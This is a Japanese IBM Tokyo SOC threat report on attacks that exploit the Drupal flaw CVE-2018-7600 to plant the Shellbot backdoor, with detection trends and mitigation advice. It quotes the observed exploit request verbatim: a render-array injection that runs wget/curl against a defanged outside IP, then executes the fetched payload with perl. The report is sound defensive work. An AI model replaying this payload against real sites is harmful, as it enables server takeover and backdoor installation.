Tokyo SOC Report

Drupalの脆弱性(CVE-2018-7600)を悪用したWebサイトへの広範囲な攻撃を観測

2018-11-09

カテゴリー Tokyo SOC Report | 検知状況

記事をシェアする:

IBM Managed Security Services(MSS)のインテリジェンス・アナリストは、攻撃者がDrupalの脆弱性を悪用して多数のWebサイトに対して攻撃を行い、バックドア(Shellbot)の設置を試みていることを確認しました。[1]

 

WordPress同様、DrupalはWebサイトの作成や管理を行う人に広く利用されているオープンソースのコンテント・マネジメント・システム(CMS)のひとつです。

CMSは非常に多くのWebサイトで利用されており、攻撃者にとっても格好の標的となっています。攻撃者はCMSの脆弱性を悪用する自動化されたツールを作成することで、Webサイトに対してランダムに攻撃を行い、脆弱なCMSを利用している多数のWebサイトを乗っ取り、改ざんすることが可能です。

最近の調査により、不審なHTTP POSTリクエストを繰り返し送信している不審なIPアドレス(31[.]204[.]80[.]133)を確認しました。

以下はそのPOSTリクエストの内容です。

/?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 64[.]15[.]78[.]216/lip;perl;
cd /tmp;curl -O 64[.]15[.]78[.]216/lip;perl lip;rm -rf lip*&name[#post_render][]=passthru

さらに調査を行ったところ、これらのリクエストの内容と同様の特徴をもつ通信を行っている送信元が多数存在することが判明しました。このような特徴を持つ通信は2018年8月12日ごろより確認されており、10月23日まで継続していました。

不審なHTTP POSTリクエストの検知数推移

不審なHTTP POSTリクエストの検知数推移
(Tokyo SOC調べ 2018年8月1日~2018年10月31日)

これらの送信元は、脆弱性のあるWebサイトを調査するため、Drupalの脆弱性(CVE-2018-7600、別名「Drupalgeddon 2.0」)を利用しており、脆弱性が存在する場合、最終的にShellbotを利用してバックドアの設置を行っています。また、調査行為においては、別の脆弱性(CVE-2018-7602)もあわせて利用しています。

これら2つのDrupalの脆弱性は既に修正されたパッチがリリースされています。

 

攻撃に成功した場合に設置されるShellbotは、IRCでC&Cサーバーと通信を行います。また、多数のツールが組み込まれており、DDoS攻撃を行ったり、SQLインジェクションやその他の脆弱性を調査したり、ユーザー権限の昇格を行ったりすることが可能となっています。

 

Shellbot自体は古くから存在するもので、2005年頃より攻撃者に利用されています。

現在でも引き続きいくつかの攻撃グループが利用しており、最近では2017年にApache Strutsの脆弱性(CVE-2017-5638)を悪用してShellbotを実行し、仮想通貨採掘を行っていたことが確認されています。

 

同様の攻撃の被害にあわないために以下のような対策を行うことを推奨します。

 

  • CMSを利用している場合、最新のバージョンを利用する
  • CMSのプラグインや拡張機能の見直しや最新化
  • CMSの管理画面等へのアクセス制御
  • パスワードに推測困難な文字列を利用する
  • IPSやWAF等のセキュリティ機器で検知・防御が可能となっているか確認する

 

本攻撃キャンペーンの詳細やIoC情報はX-Force Exchange[2]を参照してください。

 

【参考情報】
[1] Threat Actors Prey on Drupalgeddon Vulnerability to Mass-Compromise Websites and Underlying Servers
https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/

 

[2] Backdoor.Shellbot Exploiting CVE-2018-7600
https://exchange.xforce.ibmcloud.com/collection/BackdoorShellbot-Exploiting-CVE-2018-7600-e32a761d1df0abbd396ed92a16b5e9f7

 

【著者情報】

猪股 秀樹の写真

猪股 秀樹

2000年インターネットセキュリティシステムズ株式会社入社。セキュリティー診断やIDS/IPSの導入プロジェクト、セキュリティー・コンサルティングなどさまざまなプロジェクトを手がける。2007年買収に伴い日本IBMに移籍。2012年よりセキュリティー・オペレーション・センターのチーフ・セキュリティー・アナリスト。

前の記事

Apache Struts2の脆弱性(S2-057/CVE-2018-11776)を狙う攻撃の動向について

次の記事

マルウェア「Ursnif」への感染を狙う不正な日本語メールの検知状況
More Tokyo SOC Report stories

X-Force

2020-03-25

X-Force が新型コロナウイルスに便乗した不正ドメインを検知

X-Force は、メディア業界を標的とした新型コロナウイルスに便乗した新しいスクワッティング・キャンペーンを検知し、X-Force Exchange (XFE) で公開しました。このキャンペーンは、ユーザーにログイン認 […]

さらに読む

セキュリティー・インテリジェンス

2020-02-17

小売業のセキュリティー対策はセール時期を問わず常時必須

IBM Security X-Force(Incident Response and Intelligence Services)のデータによると、小売サービス業界は、全業界の中で4番目に多い攻撃対象となっており、201 […]

さらに読む

セキュリティー・インテリジェンス

2020-02-07

ワイパー型マルウェア ZeroCleareが中東のエネルギー産業を標的に

中東のエネルギー産業を標的にした破壊的マルウェア攻撃 世界的なセキュリティー研究開発機関であるIBM X-Forceは、これまで長い期間にわたり中東の産業、特にエネルギー産業における破壊的マルウェアの調査と追跡を行ってき […]

さらに読む